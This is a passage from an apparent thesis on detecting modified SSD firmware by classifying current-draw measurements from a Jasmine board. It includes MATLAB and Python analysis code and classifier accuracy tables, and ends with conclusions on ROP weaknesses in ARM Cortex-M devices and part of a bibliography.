As shown in Figure 4.1, the data collection rig consists of four main components. The Jasmine SSD board is at the bottom and has been initialized and formatted prior to each trial. The current probe is connected to a common ground reference with the board and is set up to monitor the power supply line. The host system is running the Windows operating system and is loaded with software to flash and initialize the Jasmine board over the SATA connection. Optionally, a serial connection can be made to allow the SSD status to be monitored via UART during the debugging stage. This system also contains the scripts which trigger the data recorder to start and stop collections and to perform the SSD operations which are intended to be observed. Finally, data are collected on a Gen 3i Data Recorder which displays the data during a trial and also saves the raw data to disk for offline analysis.

[Figure components: Session Control Scripts, Gen 3i Data Recorder, Host System, Jasmine Board, Current Probe]

Figure 4.1: The laboratory setup to write data to the SSD and measure current draw

4.1.2 Data Processing

In this section, we detail how the data which were collected in the previous section can be processed with machine learning techniques to create a classifier to distinguish between two firmware images. In the following sections, we provide the results of these classification efforts and then discuss the implications of a successful classifier for SSD firmware.

A sample of the code used for processing batches of collected data is included in Listing 4.1.

Listing 4.1: Processing Current Draw Data

% Developed with the Computer Engineering and Cyber Security Research
% group at the United States Naval Academy

function [results, info] = GenerateMemSysFollowOnResults(rootPath)

%CONSTANTS
CLASSIFIERS = {'Logistic Regression'; 'Quadratic Discriminant Analysis'; '3-Nearest Neighbor'};
% 10 ensures that with probability ~99.9% (exactly 100*(1-1/(2^10))) we will
% observe all four possible combinations of test/train sets. This will
% manifest itself as up to two unique accuracy values, because 2-fold
% cross-validation (which takes care of two of the four combos) is happening
% on each iteration. So the final result is achieved by averaging the UNIQUE
% values obtained over the 10 runs.
NUM_TWO_FOLD_CV_RANDOM_SPLITS = 10;

%MAIN PROGRAM
results = struct; % initialize structure to hold results
numClassifiers = length(CLASSIFIERS);
dirListing = dir(rootPath);
dirListing = dirListing(~ismember({dirListing.name}, {'.', '..'}));
% results.dirNames holds the name of each individual binary classification
% experiment's directory
results.dirNames = {dirListing.name}; clear dirListing;

% initialize cell array to hold results
numExperiments = length(results.dirNames);
resultsAll = cell(size(results.dirNames)); % each entry of resultsAll will hold the results of one experiment
for i = 1:numExperiments
    % each entry of resultsAll will be a 3x1 cell array holding a single
    % experiment's results for logistic regression, QDA, and 3-NN, respectively
    resultsAll{i} = cell(3, 1);
end

% populate the array
for i = 1:numExperiments
    currentDir = fullfile(rootPath, results.dirNames{i});
    disp(['Processing BEGUN for ' currentDir '.']);
    for j = 1:numClassifiers
        for k = 1:NUM_TWO_FOLD_CV_RANDOM_SPLITS
            resultsJasmine = ClassifyModifiedFirmwareRandFileIndices(currentDir, 'analysis_times.txt', 'Jasmine - Probe', 'probe', j);
            resultsAll{i}{j,1} = [resultsAll{i}{j,1} resultsJasmine.performance{1}];
        end
        disp(['Finished running ' CLASSIFIERS{j} '.']);
    end
    disp(['Processing COMPLETED for ' currentDir '.']);
end

% now summarize results using the single metric of average accuracy, where
% averaging is done over all four possible combinations of testing and
% training sets. (There are only four possible combinations because only
% two batches were collected for each class.)
info = sprintf(['Rows of results.accuracies correspond to the classifiers listed in results.classifiers, in order.\n' ...
    'Columns of results.accuracies correspond to the directories listed in results.dirNames, in order.\n' ...
    'results.rootPath gives the parent directory for results.dirNames. Entries of results.accuracies\n' ...
    'are average classification accuracies, where the averaging is done over all four possible\n' ...
    'combinations of testing and training sets. There are four such combinations because two batches\n' ...
    'were collected for each class.']);
results.rootPath = rootPath;
results.classifiers = CLASSIFIERS;
results.accuracies = zeros(numClassifiers, numExperiments);

% convert arrays of biolearning.classperformance objects to arrays of
% flat structures
for i = 1:numExperiments
    for j = 1:numClassifiers
        resultsAll{i}{j} = arrayfun(@struct, resultsAll{i}{j});
    end
end

% populate results.accuracies
for i = 1:numClassifiers
    for j = 1:numExperiments
        results.accuracies(i,j) = mean(unique([resultsAll{j}{i}.CorrectRate]));
    end
end

% add a completion timestamp
results.completionTime = datestr(datevec(now));

end

Preliminary examination of a held-out set of two recordings, one from each firmware class (modified and unmodified), suggested that the power in relatively low-frequency components of the SSD current signal could be used to discriminate the firmware classes. As an initial processing step in this study, recordings were therefore downsampled by a factor of 10^4 after lowpass filtering with an 8th-order Chebyshev Type I filter (8 Hz cutoff frequency; 0.05 dB maximal passband ripple), applied in the forward and reverse directions to achieve zero phase. For each trial, 300 s (seconds) of SSD current were analyzed in 25 s non-overlapping segments. Each segment was transformed to the frequency domain using Welch's modified periodogram method [96] (10 s Hamming-windowed sub-segments with 5 s of overlap; 256-point Discrete Fourier Transforms) to estimate the power spectral density (PSD). The PSD estimate was integrated in non-overlapping frequency bins of 0.5 Hz width, spanning 0 to 10 Hz, and converted to the decibel scale, yielding a 1 x 20 feature vector for each 25 s observation. Each 300 s trial therefore produces a 12 x 20 matrix, with each row representing an observation. These processing steps are illustrated in Fig. 4.2. These data matrices are then concatenated across the 20 total trials (10 modified and 10 unmodified recordings) in each experiment to produce the complete data set for the experiment. The data set is balanced, with an equal number (n = 120) of observations in each class.
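The Welch-and-binning stage of this pipeline can be sketched as follows. This is an illustrative Python/numpy version, not the MATLAB code actually used: the decimation/filtering step is omitted, and the function names are ours.

```python
import numpy as np

def welch_psd(x, fs, nperseg, noverlap, nfft):
    """Welch's modified periodogram method: average the periodograms of
    Hamming-windowed, overlapping sub-segments (one-sided PSD estimate)."""
    win = np.hamming(nperseg)
    step = nperseg - noverlap
    scale = fs * np.sum(win ** 2)                    # PSD normalization factor
    starts = np.arange(0, len(x) - nperseg + 1, step)
    psd = np.zeros(nfft // 2 + 1)
    for s in starts:
        seg = x[s:s + nperseg] * win
        psd += np.abs(np.fft.rfft(seg, nfft)) ** 2 / scale
    psd /= len(starts)
    psd[1:-1] *= 2                                   # fold negative-frequency power
    return np.fft.rfftfreq(nfft, 1.0 / fs), psd

def segment_features(seg, fs=20.0):
    """One 25 s segment at 20 Hz (500 samples after decimation) -> 1 x 20
    feature vector: PSD integrated in 0.5 Hz bins over 0-10 Hz, in dB."""
    freqs, psd = welch_psd(seg, fs,
                           nperseg=int(10 * fs),     # 10 s sub-segments
                           noverlap=int(5 * fs),     # 5 s overlap
                           nfft=256)                 # 256-point DFTs
    df = fs / 256
    edges = np.arange(0.0, 10.5, 0.5)                # 0-10 Hz in 0.5 Hz bins
    power = [psd[(freqs >= lo) & (freqs < hi)].sum() * df
             for lo, hi in zip(edges[:-1], edges[1:])]
    return 10.0 * np.log10(np.asarray(power) + 1e-30)
```

Stacking the 12 feature vectors from a 300 s trial then yields the 12 x 20 observation matrix described above.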

4.1.3 Firmware Binary Classifier

We compared the accuracy of three supervised learning techniques in discriminating firmware classes using these features. The first method was Logistic Regression (LR), in which a linear class boundary is learned by assuming sigmoid models for the posterior probabilities of the two firmware classes (modified and unmodified) and finding the model parameters that maximize the conditional likelihood function [50]. The second method was Quadratic Discriminant Analysis (QDA) [50], which can find a curved class boundary (a quadratic surface). In this method, test observations are assigned to the class with the largest posterior probability assuming Gaussian class-conditional densities, and model parameters are estimated via maximum likelihood. The third method of classification was the k-Nearest Neighbors (k-NN) algorithm [50], a still more flexible nonlinear method that assigns class labels to test points according to a plurality vote among the closest training points in feature space. For k-NN, we used Euclidean distance as the measure of proximity and 3 as the number of neighbors (k = 3). These three classifiers were selected because they are representative state-of-the-practice methods [50] that span the spectrum of model flexibility, from linear methods with potentially high bias but low variance to highly nonlinear methods with potentially low bias but high variance.

Figure 4.2: Pre-processing Stage for a Single Current Recording.
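As an illustration of the k-NN decision rule described above (Euclidean distance, plurality vote, k = 3), a minimal numpy version can be written in a few lines; this sketch is ours and is not the implementation used in the study.

```python
import numpy as np

def knn_predict(X_train, y_train, X_test, k=3):
    """k-NN: each test point receives the plurality label among its k
    closest training points, with Euclidean distance as proximity."""
    preds = []
    for x in X_test:
        d = np.linalg.norm(X_train - x, axis=1)   # distances to all training points
        nearest = y_train[np.argsort(d)[:k]]      # labels of the k nearest neighbors
        vals, counts = np.unique(nearest, return_counts=True)
        preds.append(vals[np.argmax(counts)])     # plurality vote
    return np.array(preds)
```

With k = 3 and two well-separated clusters of training points, each test point is simply assigned to the cluster it falls nearest.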

Test set performance was estimated using a 50/50 hold-out set approach, with disjoint training and testing sets each formed by combining one modified firmware batch and one unmodified firmware batch. For each experiment, reported classifier accuracy is the average test set accuracy over all four possible combinations of training and testing sets. Technically, due to the stochastic nature of the algorithm we used, this is a probabilistic statement: all four possible combinations were used with > 99.9% probability.
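The four train/test combinations can be enumerated explicitly. The batch labels below are hypothetical stand-ins for the two modified (M1, M2) and two unmodified (U1, U2) batches collected per experiment:

```python
from itertools import product

modified = ["M1", "M2"]      # two batches collected with modified firmware
unmodified = ["U1", "U2"]    # two batches collected with unmodified firmware

splits = []
for m, u in product(modified, unmodified):
    train = {m, u}                              # one batch of each class
    test = set(modified + unmodified) - train   # the remaining two batches
    splits.append((train, test))

# Reported accuracy for an experiment is the mean test accuracy over
# these four disjoint 50/50 splits.
for train, test in splits:
    print(sorted(train), "->", sorted(test))
```

Each split trains on exactly one batch per class and tests on the other two batches, so the four splits exhaust the possible pairings.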

Prior to classifier training, Principal Components Analysis (PCA) was applied to reduce the dimensionality of the feature set. Specifically, we retain the minimum number of principal components required to account for at least 90% of the data variance, as in [24]. Test data are mapped to the principal component space of the training data before they are classified, as described in Fig. 4.3. Fig. 4.4 shows clear separation of the modified and unmodified firmware classes at 50°C in principal component space, which accounts for the high accuracies of the classifiers.
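This dimensionality-reduction step can be sketched as below (an illustrative numpy version with our own helper names). The key point is that the components are fit on training data only, and held-out test data are projected into that same space:

```python
import numpy as np

def pca_fit(X_train, var_frac=0.90):
    """Fit PCA on training data only; keep the fewest principal components
    that explain at least var_frac of the total variance."""
    mu = X_train.mean(axis=0)
    Xc = X_train - mu
    # SVD of the centered data: rows of Vt are principal directions
    U, S, Vt = np.linalg.svd(Xc, full_matrices=False)
    var = S ** 2
    k = int(np.searchsorted(np.cumsum(var) / var.sum(), var_frac)) + 1
    return mu, Vt[:k].T          # training mean and projection matrix W

def pca_transform(X, mu, W):
    """Map data (training or held-out test) into the training PC space."""
    return (X - mu) @ W
```

Test observations are classified after `pca_transform` using the mean and projection matrix learned from the training batches.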

Figure 4.3: Processing Stage for a Batch of Current Recordings.

Figure 4.4: Scatter plot of the first 3 Principal Components for unmodified Greedy vs. Greedy-50% firmware at 50°C.

4.2 Classifying Different Levels of Modification

The first goal is to build binary classifiers to distinguish different versions of modified Greedy firmware from the original, unmodified version. When the OS writes a file to the Jasmine SSD, data is first stored in the SSD DRAM buffers until ftl_write calls from the Flash Translation Layer (FTL) are issued to move small segments of data to the appropriate locations within the flash array. Due to the dynamic characteristics of the FTL, such as wear leveling and garbage collection, these segments are scattered throughout the flash array, but the distribution is uniform. This means that any call to ftl_write has an equal chance of writing to any of the eight banks in flash memory. The firmware modification in this research is a full clearance of the DRAM read and write buffers (64 MB), which occurs conditionally. This condition is set based on the current bank chosen during an ftl_write. With a total of eight banks, there is a 1/8, or 12.5%, chance of any particular bank being selected. To control the probability of an erasure event, we can choose how many banks we allow to cause the condition to evaluate as True. We define a modified version of our Greedy firmware to be a "Greedy-X%" firmware, where X denotes the percentage probability that a DRAM clearance will occur upon evaluating the condition. For example, if selection of bank 0 or 1 causes the condition to evaluate as True, there would be a 2/8, or 25%, chance of a DRAM erasure event. This would be called a Greedy-25% variant of the firmware.

To space out the conditional occurrences of data erasure, we only evaluate the condition on every 1000th ftl_write command, but not on the preceding 999. This spacing between possible erasures bounds the intrusiveness of our modification on normal user operations. Based on the size of the DRAM buffers and the average number of DRAM clearance operations observed in our collections of Greedy-100% firmware (the maximum effect), this could impact up to 40% of the user data.
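The trigger logic described above can be sketched as follows. This is an illustrative Python stand-in with our own names; the real condition lives inside the Jasmine FTL's ftl_write path in C.

```python
import random

NUM_BANKS = 8
CHECK_INTERVAL = 1000  # evaluate the erase condition only on every 1000th ftl_write

def make_trigger(x_percent):
    """Greedy-X%: on a checked write, selecting any of the first
    (X/100)*8 banks triggers a DRAM buffer clearance."""
    triggering_banks = set(range(int(round(x_percent / 100 * NUM_BANKS))))
    write_count = 0

    def on_ftl_write():
        nonlocal write_count
        write_count += 1
        if write_count % CHECK_INTERVAL != 0:
            return False                    # condition not evaluated on this write
        bank = random.randrange(NUM_BANKS)  # uniform bank selection by the FTL
        return bank in triggering_banks     # True -> clear the DRAM buffers

    return on_ftl_write

# Greedy-25%: banks {0, 1} trigger, so on average one erasure per 4000 writes.
trigger = make_trigger(25)
```

Greedy-0% keeps the trigger code but an empty bank set, and Greedy-100% erases on every checked write, matching the variants described in the text.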

Since favorable results were already achieved with Greedy-50% firmware [24], we collect data with reduced granularity at higher probabilities to establish the maximum classification accuracy achieved with Greedy-100%. To seek out a minimum threshold for classification, we collect data at lower probabilities with the maximum granularity of 12.5%. The final set of probabilities examined is 0%, 12.5%, 25%, 37.5%, 50%, 75%, and 100%. We differentiate between the original Greedy FTL and a Greedy-0% FTL, as the latter includes code to support the DRAM clearance modification yet keeps the probability fixed at 0%. Operationally, these two versions should appear nearly identical.

An example of a comparison between firmware with different probabilities of modification can be seen in Fig. 4.5. Here, arrows are added beneath each visible transient in the time domain. The salience of these transients gives confidence that there are current draw changes which may be classifiable in the frequency domain using our techniques described below. As expected, note that the Greedy-100% produces more frequent transients than in Fig. 3.5 (recorded with Greedy-50%).

For collection, we must perform a run for each desired modified firmware version. That run consists of four batches: a batch with the unmodified FTL, then a batch with the FTL modified to that probability, then another unmodified batch, and finally another modified batch. Interleaving the batches of modified and unmodified firmware classes weakens the direct relationship between firmware class and time of collection, ensuring that the classifier cannot spuriously leverage features of the SSD current signature that might be correlated with time but not firmware class in discriminating the two classes. Each of the batches consists of five identical trials.

Figure 4.5: Current over time comparison between Greedy and Greedy-100% firmware.

For every trial, the factory mode jumper on the Jasmine SSD board is checked to verify that the board is in normal operating mode and will present itself as an SSD to the host system to which it is attached. The Jasmine is then powered on and the current probe is attached to its Serial Advanced Technology Attachment (SATA) power supply line. This current probe is connected to a Tektronix TCPA300 amplifier, which is calibrated before the start of the trial by detaching the probe from the SATA power line and pressing the Autobalance button. The amplifier signal is then directed into the Gen3i data recorder for time domain signal capture at 14 bits per sample and 200,000 samples per second [83]. The start and finish of a trial are triggered via serial port impulses. We use a script on the host system to programmatically format the Jasmine SSD, start the trial, write 1000 randomly generated 10 MB files to the Jasmine SSD, and end the trial. Each trial lasts for six minutes on average. Following each trial, the Gen3i is configured to immediately export the current draw time series data to a MATLAB formatted file for follow-on processing. This export process is mainly responsible for the delay between trials (typically 10-12 minutes per trial), which is proportional to the amount of data collected.
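The host-side write workload can be sketched as below. This is a hypothetical Python stand-in for the actual host script: drive formatting and the serial-port start/stop triggers are omitted, and the mount point and file naming are our assumptions.

```python
import os
import secrets

def run_trial(mount_point, num_files=1000, file_size=10 * 1024 * 1024):
    """Write num_files randomly generated files of file_size bytes to the
    drive under test. (Formatting the drive and toggling the serial-port
    trigger lines are omitted; the mount point is hypothetical.)"""
    for i in range(num_files):
        data = secrets.token_bytes(file_size)   # random, incompressible payload
        path = os.path.join(mount_point, f"trial_{i:04d}.bin")
        with open(path, "wb") as f:
            f.write(data)
            f.flush()
            os.fsync(f.fileno())                # force the write to the SSD, not the page cache
```

Random payloads and an fsync per file keep the FTL busy issuing ftl_write calls throughout the trial rather than letting data sit in the host's page cache.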

In Fig. 4.6, the results of classifying current drawn for different versions of modified Greedy firmware compared to the current drawn for the original unmodified firmware are shown. As noted earlier, Greedy-0% includes code to support the DRAM clearance modification, yet keeps the probability of erasure at 0%. This is a slight change to the firmware and as shown in Table 4.1, the accuracy in detecting this change is only slightly better than chance. As expected, the higher the probability of erasures, the greater the change in how the firmware operates, resulting in better accuracy for all three binary classifiers up to perfect or near-perfect accuracy.

Table 4.1: Accuracy of Binary Classifiers (% Modification of Firmware)

          LR      QDA     kNN
0%        0.5375  0.5292  0.5542
12.5%     0.6417  0.6417  0.6604
25%       0.8250  0.8292  0.8167
37.5%     0.8583  0.8771  0.8833
50%       0.9187  0.9500  0.9646
75%       0.9729  0.9833  0.9854
100%      0.9958  1.0000  0.9958

4.3 Classifying at Different Temperatures

Figure 4.6: Classifier performance vs. Greedy-X%.

The second experiment tests the robustness of the classifier across realistic operating environments, starting with varying temperatures. As seen in Fig. 4.7, we control temperature manually using an electric heating pad connected to a variac (variable autotransformer) and measure it using an Analog Devices TMP35 temperature sensor, which is attached to the Barefoot controller using a silver thermal compound to achieve good thermal contact. The sensor output is monitored using an oscilloscope. Underneath the Jasmine board, the heating pad is placed in an area which will direct heat to the base of the Barefoot controller (as shown in Fig. 4.8). Prior to a trial, the variac is slowly turned up to the desired temperature while monitoring the oscilloscope output in preview mode. The average temperature is allowed to settle to near constant for several minutes before the start of a trial. The actual average temperature sensed after settling is often higher than the variac set point, which, along with the operational temperature of the microcontroller, explains the differences between the temperature setting and the temperature observed in Fig. 4.9.

We set the heating pad for these trials to temperatures in an expected operating range for storage drives [80]. This range includes 25°C (the baseline "room" temperature for all other experiments), 30°C, 35°C, 40°C, 45°C, and 50°C, though the operating circuitry on the Jasmine board tends to raise the temperature higher during trials, as shown in Fig. 4.9. The run at each temperature consists of four batches collected using the same interleaving strategy described above, with five trials in each batch, except that the batches with modified firmware are always Greedy-50%.

Figure 4.7: Top view of Jasmine board set up for temperature data collection.

Figure 4.8: Bottom view of Jasmine board with heating pad placement.

Figure 4.9: Temperature settings compared to actual temperatures observed during a trial.

An example of the differences in recorded current between firmware versions at a higher operating temperature than the 25°C baseline is shown in Fig. 4.10. Arrows are added beneath each visible transient to highlight the frequency of occurrence.

In Fig. 4.11, which is a plot of accuracy versus temperature for all three classifiers, the results of classifying current drawn at different temperatures are shown, from room temperature (25°C) up to 50°C. At all temperatures, the classification is applied to the case of Greedy-50% versus unmodified Greedy firmware. All three classifiers are robust to changes in the temperature of the SSD within a reasonable operating range, with accuracies greater than 90%.

Figure 4.10: Current over time comparison between Greedy and Greedy-50% firmware, both at 45°C.

Table 4.2: Robustness of Binary Classifiers with Temperature Variation (with 50% Probability of Modification)

            LR      QDA     kNN
Room Temp   0.9042  0.9208  0.9250
30°C        0.9167  0.9146  0.9333
35°C        0.9313  0.9458  0.9396
40°C        0.9417  0.9500  0.9583
45°C        0.9396  0.9375  0.9437
50°C        0.9500  0.9479  0.9542

4.4 Classifying with Different Power Supplies

In the final experiment, we compare the performance of the classifier when the Jasmine board is powered by the internal stock power supply to when it is powered by two different external power supply units. To investigate this, experiments were run using the stock power supply of the testing computer system, a high efficiency power supply, and a premium power supply that is more likely to be found in a higher-end system (e.g., a gaming computer). The stock power supply is a 350W Seasonic SS-350ET Active PFC F3, an 80Plus Bronze class power supply rated at 82% efficiency [1]. The premium power supply is a 550W EVGA SuperNOVA 550 G2, an 80Plus Gold power supply rated at 90% efficiency [2]. The last power supply we test is the 460W Dynapower USA TC-1U46P80, to give a head-to-head comparison with the EVGA SuperNOVA as external supplies. The Dynapower is an 80Plus class power supply rated at 86% efficiency [3]. All three Power Supply Units (PSUs) employ active power factor correction.

We perform three runs, one with each power supply unit providing power to the Jasmine board. The runs for these power supplies consist of four batches, interleaved in the same manner as the temperature collections. Again, each batch was made up of five identical trials as described above.

[1] https://www.newegg.com/seasonic-80-plus-ss-350et-bronze-350w/p/N82E16817151077/ (Last accessed 02-Jul-2019)
[2] http://www.evga.com/products/Specs/PSU.aspx?pn=c882f52c-92c4-4f95-9a0e-f4c9f8c183a6 (Last accessed 02-Jul-2019)
[3] http://www.dynapowerusa.com/product/1u-power-supply-80plus-460w-tc-1u46p80 (Last accessed 02-Jul-2019)

Figure 4.11: Classifier performance vs. temperature (classifies Greedy and Greedy-50%).

An example of the differences in recorded current between modified and unmodified firmware when the Jasmine board is supplied by an external PSU is provided in Fig. 4.12. Note that the frequency at which transients occur is similar between this supplied power experiment and other experiments (Figs. 3.5 and 4.10) where Greedy-50% is used.

In Fig. 4.13, the results of classifying current drawn by the Jasmine SSD from different power supplies are shown. These are the Seasonic, Dynapower, and EVGA power supplies. With each PSU, the experiment is run with the original Greedy firmware versus the 50% probability modified version. We verify that the classifier remains highly accurate as the power supply for the SSD is changed, as displayed in Table 4.3. Again, we see accuracy of approximately 90% or better with all three power supplies tested, demonstrating the robustness of classification in the face of an external hardware configuration change.

Figure 4.12: Current over time comparison between Greedy and Greedy-50% firmware, both using an external power supply.

Table 4.3: Robustness of Binary Classifiers with Power Supply (with 50% Probability of Modification)

                       LR      QDA     kNN
Internal (Seasonic)    0.9167  0.8854  0.9083
External (Dynapower)   0.9375  0.9500  0.9688
External (EVGA)        0.9583  0.9604  0.9604

Figure 4.13: Robustness of Binary Classifiers with Power Supply changes (classifies Greedy and Greedy-50%). For each classifier (LR, QDA, kNN), accuracy bars are for the Internal Seasonic (left), External Dynapower (middle), and External EVGA (right) power supplies.

4.5 Classifying in Dynamic Conditions

The classification work done thus far has concentrated on training the classifier under one set of conditions and then testing it under the same set of conditions, for example, training the classifier at 50°C and testing at 50°C. In operational environments, the conditions are likely to be much more dynamic. It is useful to know whether our classifier maintains its accuracy as these conditions change.

We check the dynamic applicability of our QDA classifier by training it at each temperature shown in Table 4.2 and testing it against data collected at every temperature. The results are included in Fig. 4.14.

Figure 4.14: QDA classifier performance trained and tested at each temperature.

We check the dynamic applicability of our QDA classifier by training it with each power supply shown in Table 4.3 and testing it against the other power supplies. The results are shown in Fig. 4.15.

Figure 4.15: QDA classifier performance trained and tested with each power supply.
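The cross-condition evaluations of Figs. 4.14 and 4.15 can be organized as a train/test grid. The sketch below is illustrative: the `train_fn` and `predict_fn` hooks are our hypothetical stand-ins for fitting and applying the QDA classifier.

```python
import numpy as np

def cross_condition_accuracy(datasets, train_fn, predict_fn):
    """datasets: list of (X, y) pairs, one per condition (e.g., one per
    temperature or power supply). Train on each condition and test on every
    condition; entry (i, j) is the accuracy of the model trained on
    condition i when tested on condition j. The diagonal reproduces the
    matched-condition results; off-diagonal entries probe generalization."""
    n = len(datasets)
    acc = np.zeros((n, n))
    for i, (X_train, y_train) in enumerate(datasets):
        model = train_fn(X_train, y_train)
        for j, (X_test, y_test) in enumerate(datasets):
            acc[i, j] = np.mean(predict_fn(model, X_test) == y_test)
    return acc
```

A classifier that generalizes well across conditions shows uniformly high values across each row, not just on the diagonal.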

These plots suggest that our QDA classifier generalizes well across power supplies, as all accuracies remain above 94%. The results across temperatures, however, warrant further investigation: accuracies for training and testing temperatures between 30°C and 45°C remain above 90%, but tests involving the highest and lowest temperatures produce outlier results.

Chapter 5

Conclusions

This work has shed light on the state of security in modern embedded devices based on the ARM architecture.

In Chapter 2, we discovered that devices in the current embedded ecosystem are implementing basic security controls, but not enough to defend against a determined and skilled modern attacker. These devices make memory protection techniques like non-executable stacks and write-XOR-execute policies available, yet they are neither mandatory nor enabled by default. Even if these techniques are adopted, they only protect against the previous generation of vulnerabilities, for example the classic stack-based buffer overflow. These devices are still not equipped to mitigate modern attacks like Return Oriented Programming, which accomplish the goals of an attacker without injecting any new code.

This weakness was demonstrated on the Cortex-M4F using the example of a Tiva TM4C123GH6PM. It has been shown that even small areas of existing program code are enough to reprogram the flash memory of a resource constrained device using ROP. The practice of loading the on-chip ROM with peripheral libraries and other potentially unused code makes it a prime target for ROP attacks. The gadget sets needed to erase and reprogram the flash memory were quite small, and therefore could likely be found in many simple programs. A portion of flash memory can be erased using only 4 gadgets. It has also been shown that a Turing-complete gadget set can be identified in the peripheral driver libraries, which would allow for arbitrary execution if a device was compromised. We discussed various return-like instructions that can be used for ROP on this device and have introduced a novel technique. We have also located gadgets which allow us to control the stack pointer, making efficient loops possible.

Defense against ROP attacks has been explored with popular approaches including ROPGuard [47], ROPecker [32], and kBouncer [73]. Unfortunately, these techniques add significant overhead to the system and have all been bypassed in a more rigorous analysis [81]. Therefore, they are not currently practical to implement in a resource constrained embedded device. We have shown that omission of modern security controls leaves a plethora of resource constrained products wide open to attack. Successful defense against ROP that is practical for resource constrained embedded systems remains a topic that requires the attention of the security research community.

In Chapters 3 and 4, we analyzed the security of Solid State Drives, which are fully self-contained embedded systems that are increasingly responsible for the storage and protection of critical and sensitive data. We learned that SSDs contain complex and layered firmware which presents a viable vector for attack [22]. Unfortunately, these devices and their firmware are entirely proprietary, leaving researchers and consumers with no simple means of validating the authenticity of the firmware or testing for resident indicators of compromise.

This work presented and evaluated a framework for non-intrusively verifying the integrity of SSD firmware. It demonstrated that a classifier can be trained to detect modifications to the firmware running on an embedded device. This classifier processed current draw data from trials running on the open-source Jasmine board. It was able to distinguish modified firmware from unmodified firmware with increasing accuracy as the probability of modification increased. With Greedy-50% or higher percentage versions, the classifier accuracy was above 90% in all cases, and at least 95% for the QDA and k-NN approaches. One of the goals alluded to in Section 4.2 was to seek a minimum threshold for classification. The results given in Table 4.1 show that if we define 80% as an acceptable level of classification accuracy, there would need to be at least a 25% probability of erasure for this modification of Jasmine SSD firmware to be reliably detected.

The results of this work also demonstrated that a classifier of firmware can be resilient to changes in its environment, such as temperature. While varying the temperature experienced by the SSD across several representative values within the expected operating range of a storage drive [80], the classifier was still able to distinguish modified firmware from unmodified firmware with over 90% accuracy with all three classification methods. Further, it was demonstrated that a firmware classifier can be resilient to hardware configuration changes. Specifically, the PSU used to supply power to the Jasmine SSD was varied, and all three classification methods performed with approximately 90% accuracy, if not higher. The results in Table 4.3 suggest that classification could be more accurate with a dedicated external PSU which is not sharing its energy resources with all the other PC components.

Finally, this work contributed a threat model to assist manufacturers and end users in assessing risk to SSD firmware. It described how threats to firmware could be considered across Ownership, Internet, and Physical Trust Boundaries. Historically, attackers have been continually able to find and exploit weaknesses even in highly valued and secured systems while security for embedded systems, like SSDs, received less focus. It is clear that firmware verification tools, such as the classifier presented here, are needed to detect stealthy modifications to proprietary embedded systems.

5.1 Future Work

Defense against ROP attacks has been explored with popular approaches including ROPGuard [47], ROPecker [32], and kBouncer [73]. Unfortunately, these techniques add significant overhead to the system and have all been bypassed in a more rigorous analysis [81]. The development of practical defenses against ROP for resource constrained embedded systems is a topic that requires more attention in future research.

We demonstrated the ability to classify modified vs. unmodified versions of firmware on an open source platform using current draw measurements. A logical follow-on avenue of research would be to evaluate the ability of this technique to classify modified vs. unmodified versions of firmware on commercial (proprietary) solid state drives. While these proprietary drives are, by their nature, closed systems, recent work has demonstrated that it is possible, in some cases, to not only examine but alter the installed firmware on these drives [70].

Other potential follow-on work includes categorizing and attempting to classify varying "classes" of modifications. In this work we demonstrated the ability to classify based on changes to the firmware that affected the associated DRAM buffers. Future work, for example, could address modifications that impacted the wear-leveling functionality (hence, reliability) of the solid state drive.

Finally, follow-on research in this area could explore firmware modification classification using current draw on other embedded devices. This could include, but would not be limited to, novel memory devices such as the recently released Intel Optane family [1], as well as non-memory devices such as point-of-sale registers, 3D printers, and the vast spectrum of IoT products on the market.

5.2 Closing

In closing, these research findings show that modern security paradigms, while effective, are designed for the faster and more capable end user and enterprise systems. Designers need to carefully consider the security model of resource constrained embedded systems, since they are far more prevalent than general purpose computers and are increasingly adding network connectivity, which subjects these devices to the same threats as systems without similar resource constraints.

[1] https://www.intel.com/content/www/us/en/architecture-and-technology/optane-memory.html

Bibliography

[1] Fundamentals of ARMv8-A. https://static.docs.arm.com/100878/0100/fundamentals_of_armv8_a_100878_0100_en.pdf. Accessed: 2018-04-07.

[2] ARM Infocenter. http://infocenter.arm.com/help/index.jsp. Accessed: 2017-04-25.

[3] ARM TrustZone developer guide. https://developer.arm.com/technologies/trustzone. Accessed: 2018-04-07.

[4] BOOSTXL-SENSHUB Sensor Hub BoosterPack. http://www.ti.com/lit/ug/spmu290/spmu290.pdf. Accessed: 2018-04-14.

[5] Cortex-M4 devices generic user guide. http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0553a/CHDCHEAG.html. Accessed: 2017-04-25.

[6] Cortex-M Series Family description. http://www.arm.com/products/processors/cortex-m. Accessed: 2017-04-25.

[7] ARM and Thumb-2 instruction set quick reference card. http://infocenter.arm.com/help/topic/com.arm.doc.qrc0001m/QRC0001_UAL.pdf. Accessed: 2017-04-25.

[8] Thumb-2 technology. https://pax.grsecurity.net/docs/noexec.txt. Accessed: 2017-04-25.

[9] Radare2 download page. https://radare.org/r/down.html. Accessed: 2017-04-25.

[10] The Thumb instruction set. http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0210c/CACBCAAE.html. Accessed: 2017-04-25.


[11] Thumb-2 technology. http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0471k/pge1358786963523.html. Accessed: 2017-04-25.

[12] µVision user's guide. http://www.keil.com/support/man/docs/uv4/uv4_debugging.htm. Accessed: 2018-04-14.

[13] Microcontroller development kit. https://www.keil.com/demo/eval/armv4.htm. Accessed: 2018-04-14.

[14] Jim Aarestad, Dhruva Acharyya, Reza Rad, and Jim Plusquellic. Detecting trojans through leakage current analysis using multiple supply pad IDDQs. IEEE Transactions on Information Forensics and Security, 5(4):893–904, 2010.

[15] Martín Abadi, Mihai Budiu, Úlfar Erlingsson, and Jay Ligatti. Control-flow integrity principles, implementations, and applications. ACM Transactions on Information and System Security (TISSEC), 13(1):4, 2009.

[16] Sahel Alouneh, Mazen Kharbutli, and Rana AlQurem. A software approach for stack memory protection based on duplication and randomisation. International Journal of Internet Technology and Secured Transactions, 6(4):324–348, 2016.

[17] Cortex-M4 Technical Reference Manual. ARM, 2010. Revision r0p0.

[18] 8-bit Atmel Microcontroller with 128KBytes In-System Programmable Flash. ATMEL, 2011. Rev. 2467X-AVR-06/11.

[19] AVR Instruction Set Manual. ATMEL, 2016.

[20] AP Barroso, VH Machado, and V Cruz Machado. Identifying vulnerabilities in the supply chain. In Industrial Engineering and Engineering Management, 2009. IEEM 2009. IEEE International Conference on, pages 1444–1448. IEEE, 2009.

